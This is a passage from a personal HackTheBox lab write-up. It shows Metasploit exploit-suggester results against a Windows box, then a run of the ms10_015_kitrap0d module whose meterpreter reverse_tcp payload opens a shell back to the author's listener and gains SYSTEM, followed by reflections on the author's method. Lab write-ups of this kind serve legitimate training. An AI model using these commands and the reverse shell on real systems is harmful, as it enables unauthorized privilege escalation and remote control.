[*] 10.129.55.9 - 181 exploit checks are being tried...
[+] 10.129.55.9 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.129.55.9 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.129.55.9 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
[+] 10.129.55.9 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.129.55.9 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.129.55.9 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Running check method for exploit 41 / 41
[*] 10.129.55.9 - Valid modules for session 1:
============================

# Name Potentially Vulnerable? Check Result
- ---- ----------------------- ------------
1 exploit/windows/local/ms10_015_kitrap0d Yes The service is running, but could not be validated.
2 exploit/windows/local/ms14_058_track_popup_menu Yes The target appears to be vulnerable.
3 exploit/windows/local/ms14_070_tcpip_ioctl Yes The target appears to be vulnerable.
4 exploit/windows/local/ms15_051_client_copy_image Yes The target appears to be vulnerable.
5 exploit/windows/local/ms16_016_webdav Yes The service is running, but could not be validated.
6 exploit/windows/local/ppr_flatten_rec Yes The target appears to be vulnerable.

The official walkthrough uses ms14_070_tcpip_ioctl for privilege escalation; ms10_015_kitrap0d also worked for me.
Later I also tested migrating to the davcdata.exe process mentioned in the official walkthrough, and ms10_015_kitrap0d succeeded from there too 🤔.

msf6 exploit(windows/local/ms10_015_kitrap0d) > show options

Module options (exploit/windows/local/ms10_015_kitrap0d):

Name Current Setting Required Description
---- --------------- -------- -----------
SESSION 1 yes The session to run this module on


Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST tun0 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port


Exploit target:

Id Name
-- ----
0 Windows 2K SP4 - Windows 7 (x86)



View the full module info with the info, or info -d command.

msf6 exploit(windows/local/ms10_015_kitrap0d) > run

[*] Started reverse TCP handler on 10.10.16.22:4444
[*] Reflectively injecting payload and triggering the bug...
[*] Launching msiexec to host the DLL...
[+] Process 2144 launched.
[*] Reflectively injecting the DLL into 2144...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (175686 bytes) to 10.129.213.72
[*] Meterpreter session 2 opened (10.10.16.22:4444 -> 10.129.213.72:1031) at 2023-04-16 14:33:32 +0800

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Summary

Overall the box really is easy-rated, yet my own attempt felt very hard.
It should not have taken this long, and in a real engagement or competition there would not be this much time to burn.

As for the box itself, the FrontPage part feels like a trap. I sank deeper and deeper into it: I would guess what it ought to look like, then verify in the environment, and that only reinforced the guess. Later I even built a test environment and decompiled the related DLLs, which is laughable in hindsight.

When I hit difficulties on HackTheBox I often have two competing feelings: have I really tried hard enough (Try Harder), and am I on the right path at all, or was the direction wrong from the start?

Next time I will pay more attention to breadth of information gathering, and think harder about why a given direction is the right one before pouring effort into it.

One more thing: after reading k0shl's blog, I am increasingly convinced that making a habit of writing things up is worthwhile.